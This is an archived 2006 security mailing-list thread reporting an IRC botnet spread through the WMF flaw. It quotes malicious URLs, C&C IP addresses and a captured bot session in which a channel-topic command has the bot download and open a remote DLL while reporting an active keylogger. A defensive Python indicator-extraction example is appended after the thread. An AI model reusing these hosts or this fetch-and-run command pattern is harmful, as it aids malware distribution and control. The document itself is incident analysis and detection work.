lists.openwall.net - Open Source and information security mailing list archives
Date: Fri Jan 20 17:58:46 2006
From: stan.bubrouski at gmail.com (Stan Bubrouski)
Subject: Possible large botnet

Is it just me who thinks linking to a log of thousands of e-mail
addresses is in very poor taste on a mirrored list?  If they weren't
harvested before they will be now.

-sb

On 1/20/06, obnoxious@...h.com <obnoxious@...h.com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> I don't necessarily think whoever was infected was infected via
> viewing this site:
>
> http://php.tjit.or.kr/ppp/log/sent.txt
>
> Lists a slew of email addresses which whoever "could have" sent
> bogus messages to possibly infect (l)users.
>
> On Fri, 20 Jan 2006 01:35:45 -0500 Pablo Esterban
> <pablo_esterban@...mail.com> wrote:
> >Seems to be a botnet forming with the help of exploiting the recent WMF flaw
> >on the following site. AFAIK malware/adware is referencing this.
> >
> >
> >************D O  N O T  C L I C K************
> >http://213.17.233.194/mediabar.wmf
> >http://213.17.233.194/stat_s3.php
> >http://213.17.233.194/stat.html
> >************D O  N O T  C L I C K************
> >
> >This injects a trojan connecting to 219.240.142.59 on port 44234
> >
> >44234/tcp open     irc          Unreal ircd
> >47292/tcp open     irc          Unreal ircd
> >47296/tcp open     irc          Unreal ircd
> >54729/tcp open     irc-proxy    psyBNC 2.3.1
> >
> >Channel stats list around 500 bots and around 1200 connected (may or may not
> >be accurate), however if you poke around you will find
> >http://219.240.142.59/usage/, containing some interesting links and info
> >about when this most likely started.
> >
> >The TCP stream below demos the login, and calling of
> >http://219.240.142.59/ppp/mediax.dll. Stats for January list close to 90k
> >hits on this particular file(!).
> >
> >
> >NICK *****
> >USER plnaehe 0 0 :*****
> >:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
> >:irc.foonet.com NOTICE AUTH :*** Found your hostname
> >:irc.foonet.com 001 *****:Welcome to the ROXnet IRC Network *****
> >:irc.foonet.com 002 *****:Your host is irc.foonet.com, running version Unreal3.2.3
> >:irc.foonet.com 003 *****:This server was created Thu Oct 13 2005 at 17:25:57 KST
> >:irc.foonet.com 005 *****SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS WATCH=128 :are supported by this server
> >:irc.foonet.com 005 *****SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=beIqa,kfL,lj,psmntirRcOAQKVGCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=@%+ EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
> >:irc.foonet.com 251 *****:There are 1 users and 1194 invisible on 1 servers
> >:irc.foonet.com 252 *****1 :operator(s) online
> >:irc.foonet.com 253 *****201 :unknown connection(s)
> >:irc.foonet.com 254 *****10 :channels formed
> >:irc.foonet.com 255 *****:I have 1195 clients and 0 servers
> >:irc.foonet.com 265 *****:Current Local Users: 1195  Max: 5529
> >:irc.foonet.com 266 *****:Current Global Users: 1195  Max: 1276
> >:irc.foonet.com 422 *****:MOTD File is missing
> >*****MODE *****:+iwTxd
> >USERHOST *****
> >:irc.foonet.com 302 *****:*****
> >MODE *****-x+B
> >JOIN #mrbean5 rowan
> >PRIVMSG *****:[KEYLOG]: Key logger active.
> >USERHOST *****
> >MODE *****-x+B
> >JOIN #mrbean5 rowan
> >USERHOST *****
> >MODE *****-x+B
> >JOIN #mrbean5 rowan
> >:irc.foonet.com NOTICE *****:BOTMOTD File not found
> >*****MODE *****:-x+B
> >***** JOIN :#mrbean5
> >:irc.foonet.com 332 *****#mrbean5 :.wipe http://219.240.142.59/ppp/mediax.dll mediax.dll 3
> >:irc.foonet.com 333 *****#mrbean5 DDDI 1137401387
> >:irc.foonet.com 353 *****@ #mrbean5 *****
> >:irc.foonet.com 366 *****#mrbean5 :End of /NAMES list.
> >*****PRIVMSG *****:[KEYLOG]: Key logger active.
> >:irc.foonet.com 302 *****
> >:irc.foonet.com 302 *****
> >PRIVMSG #mrbean5 :[DOWNLOAD]: Downloading URL: http://219.240.142.59/ppp/mediax.dll to: mediax.dll.
> >:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)
> >PRIVMSG #mrbean5 :[DOWNLOAD]: Downloaded 214.5 KB to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll @ 71.5 KB/sec.
> >PRIVMSG #mrbean5 :[DOWNLOAD]: Opened: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll.
> >:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)
> >:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)
> >
> >
> >_______________________________________________
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >Hosted and sponsored by Secunia - http://secunia.com/
> -----BEGIN PGP SIGNATURE-----
> Note: This signature can be verified at https://www.hushtools.com/verify
> Version: Hush 2.4
>
> wkYEARECAAYFAkPQ7FsACgkQo8cxM8/cskpeWgCfYV8lOqt4qAqGHbXl3/YPjsjE26oA
> oIe+zN0P1qsDz+gfy4da+vfZ+A3y
> =suSR
> -----END PGP SIGNATURE-----
>

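The quoted capture shows the bot side of an IRC command-and-control session: the infected host registers with NICK/USER, joins a key-protected channel, treats the channel topic as its command line (.wipe <url> <file> <n>) and reports [KEYLOG] and [DOWNLOAD] status back to the channel. The Python below is an added example and not code from anyone in this thread: a small RFC 1459 line parser plus an indicator extractor, run over a constructed replay of that session (the redacted nicks are replaced with the placeholder "bot" and the long 005 lines are shortened). The function names parse_irc_line, extract_indicators and assess, and the bot-likeness heuristics in assess, are my own assumptions for illustration.

```python
"""Pull C&C indicators out of a captured IRC bot session (added example)."""
import re
from dataclasses import dataclass
from typing import Any, Dict, List, Optional

# Constructed replay of the session quoted in the thread. Nicks are the
# placeholder "bot"; lines without a leading ":server" prefix were sent by
# the infected host, prefixed lines came from the IRC server.
SAMPLE_SESSION = r"""
NICK bot
USER plnaehe 0 0 :bot
:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
:irc.foonet.com 001 bot :Welcome to the ROXnet IRC Network bot
:irc.foonet.com 002 bot :Your host is irc.foonet.com, running version Unreal3.2.3
:irc.foonet.com 005 bot SILENCE=15 MODES=12 CHANTYPES=# NETWORK=ROXnet CASEMAPPING=ascii :are supported by this server
:irc.foonet.com 251 bot :There are 1 users and 1194 invisible on 1 servers
:irc.foonet.com 255 bot :I have 1195 clients and 0 servers
:irc.foonet.com 422 bot :MOTD File is missing
MODE bot -x+B
JOIN #mrbean5 rowan
PRIVMSG bot :[KEYLOG]: Key logger active.
:irc.foonet.com 332 bot #mrbean5 :.wipe http://219.240.142.59/ppp/mediax.dll mediax.dll 3
:irc.foonet.com 333 bot #mrbean5 DDDI 1137401387
PRIVMSG #mrbean5 :[DOWNLOAD]: Downloading URL: http://219.240.142.59/ppp/mediax.dll to: mediax.dll.
PRIVMSG #mrbean5 :[DOWNLOAD]: Downloaded 214.5 KB to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll @ 71.5 KB/sec.
PRIVMSG #mrbean5 :[DOWNLOAD]: Opened: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll.
"""

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


@dataclass
class IrcMessage:
    prefix: Optional[str]   # "irc.foonet.com" for server lines, None for the client's own
    command: str            # verb (NICK, JOIN, PRIVMSG) or three-digit numeric reply
    params: List[str]       # middle params plus the trailing ":..." param, if present


def parse_irc_line(line: str) -> IrcMessage:
    """Split one IRC line into prefix, command and params (RFC 1459 framing)."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")   # trailing param may contain spaces
    parts = head.split()
    if sep:
        parts.append(trailing)
    return IrcMessage(prefix, parts[0].upper(), parts[1:])


def extract_indicators(lines: List[str]) -> Dict[str, Any]:
    """Walk a session and collect what an analyst would want for a C&C report."""
    ind: Dict[str, Any] = {
        "server": None, "network": None, "clients": None,
        "channel": None, "channel_key": None, "topic_command": None,
        "status_tags": [], "download_urls": [],
    }
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        msg = parse_irc_line(raw)
        if msg.prefix and ind["server"] is None:
            ind["server"] = msg.prefix                # first server-originated line
        if msg.command == "005":                      # ISUPPORT tokens, e.g. NETWORK=ROXnet
            for tok in msg.params:
                if tok.startswith("NETWORK="):
                    ind["network"] = tok.split("=", 1)[1]
        elif msg.command == "255":                    # "I have N clients and M servers"
            m = re.search(r"I have (\d+) clients", msg.params[-1])
            if m:
                ind["clients"] = int(m.group(1))
        elif msg.command == "JOIN" and msg.prefix is None:
            ind["channel"] = msg.params[0]            # client's own JOIN, optional key
            ind["channel_key"] = msg.params[1] if len(msg.params) > 1 else None
        elif msg.command == "332":                    # RPL_TOPIC: the bot runs it as a command
            ind["topic_command"] = msg.params[-1]
        elif msg.command == "PRIVMSG" and msg.prefix is None:
            m = re.match(r"\[([A-Z]+)\]", msg.params[-1])   # "[KEYLOG]: ...", "[DOWNLOAD]: ..."
            if m and m.group(1) not in ind["status_tags"]:
                ind["status_tags"].append(m.group(1))
        for url in URL_RE.findall(raw):               # any URL, whichever side sent it
            if url not in ind["download_urls"]:
                ind["download_urls"].append(url)
    return ind


def assess(ind: Dict[str, Any]) -> List[str]:
    """Heuristics (assumed for this example) that together mark a session as bot C&C."""
    reasons = []
    if ind["channel_key"]:
        reasons.append(f"joined key-protected channel {ind['channel']} with key {ind['channel_key']!r}")
    topic = ind["topic_command"] or ""
    if topic.startswith((".", "!")):
        reasons.append(f"channel topic is a bot command: {topic.split()[0]}")
    if ind["status_tags"]:
        reasons.append("client reports status with tags " + ", ".join(ind["status_tags"]))
    if ind["download_urls"]:
        reasons.append("second stage fetched from " + ", ".join(ind["download_urls"]))
    return reasons


if __name__ == "__main__":
    found = extract_indicators(SAMPLE_SESSION.splitlines())
    for key, value in found.items():
        print(f"{key:14} {value}")
    for reason in assess(found):
        print("  -", reason)
```

On the sample this yields the server irc.foonet.com on network ROXnet with 1195 clients, the join to #mrbean5 with key rowan, the .wipe topic command, the single second-stage URL and the KEYLOG/DOWNLOAD status tags; the same parser can be pointed at a Wireshark "Follow TCP Stream" export of any unencrypted IRC session.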